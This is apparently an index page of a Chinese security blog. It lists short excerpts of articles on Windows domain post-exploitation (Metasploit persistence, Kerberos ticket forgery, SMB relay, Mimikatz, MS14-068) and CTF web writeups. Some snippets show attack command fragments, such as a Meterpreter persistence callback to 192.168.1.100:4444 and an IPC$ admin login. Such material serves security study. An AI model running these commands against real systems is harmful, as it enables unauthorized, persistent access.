安全博客 - 第 103 | CN-SEC 中文网

Metasploit 常用维权方式

metasploit 后渗透常用的维持权限的方式. 注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P win...

12月15日安全博客23 views评论

阅读全文

Windows 单机权限维持

Windows 单机权限维持注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/me...

12月15日安全博客18 views评论

阅读全文

金银票据的利用

黄金票据利用 krbtgt 账户的 NTLM-Hash/AES-Key 伪造 TGT, 借此以访问域内所有资源. 白银票据利用服务账户的 NTLM-Hash/AES-Key 伪造 TGS Ticket...

12月15日安全博客19 views评论

阅读全文

安全博客

SMB 重放攻击

SMB 重放攻击原理以及利用方式原理可以看出, SMB 重放攻击的实质是 Client 本应该向 Attacker 请求的数据包被 Attacker 拿来以请求 Target. 重放在早期的 SM...

12月15日24 views评论

阅读全文

Mimikatz 哈希与票据传递

NTLM 协议以及 Mimikatz 哈希与票据传递 NTLM 协议A 想访问 B, 双方先确定协议版本(NTLM v1/NTLM v2). A 向 B 发送用户名信息, B 接受到用户名后用该用户的...

12月15日安全博客13 views评论

阅读全文

Windows 常用远程执行命令的手段

windows 下远程执行命令的一些方法. at历史久远. net use \\192.168.1.100\ipc$ 123456 /user:administrator at \\192.168.1...

12月15日安全博客17 views评论

阅读全文

Meterpreter 内存加载执行

具体原理和进程注入类似, 先创建一个正常的进程, 然后把这个进程里的内存空间覆盖成我们想要执行的程序. Meterpreter 方式. execute -H -m -d notepad.exe -f ...

12月15日安全博客16 views评论

阅读全文

Windows SPN 攻击

SPN 全称 Service Principal Name, 即服务主体名称. 将服务实例和服务账户与 Kerberos 协议相关联. 简单来说, SPN 使得域内的服务(例如 MSSQL Excha...

12月15日安全博客10 views评论

阅读全文

域内 MS14-068 的利用

Kerberos 认证流程以及域内 MS14-068 的利用 Kerberos 认证流程KDC(Key Distribution Center) 包含 AS(Authentication Server...

12月15日安全博客11 views评论

阅读全文

安全博客

VNCTF 2023 Web 部分 Writeup

VNCTF 2023 象棋王子右键查看源码得到 flag 电子木鱼main.rs use actix_files::Files; use actix_web::{ error, get, post, ...

12月15日17 views评论

阅读全文

安全博客

对 Thymeleaf SSTI 的一点思考

尝试写点网上没有的东西基本原理这个不多说了 https://xz.aliyun.com/t/10514 https://xz.aliyun.com/t/9826 https://www.anquan...

12月15日17 views评论

阅读全文

安全博客

DiceCTF 2023 Web 赛后复现

第一次跟 Nu1L 打国际赛, 然后自己被题目虐爆了 (不得不说 Nu1L 的师傅们实在是太强了因为比赛期间主要看了 recursive-csp codebox gift 这三道题, 所以其它题目的...

12月15日32 views评论

阅读全文

Metasploit 常用维权方式

Windows 单机权限维持

金银票据的利用

SMB 重放攻击

Mimikatz 哈希与票据传递

Windows 常用远程执行命令的手段

Meterpreter 内存加载执行

Windows SPN 攻击

域内 MS14-068 的利用

VNCTF 2023 Web 部分 Writeup

对 Thymeleaf SSTI 的一点思考

DiceCTF 2023 Web 赛后复现

在线咨询

微信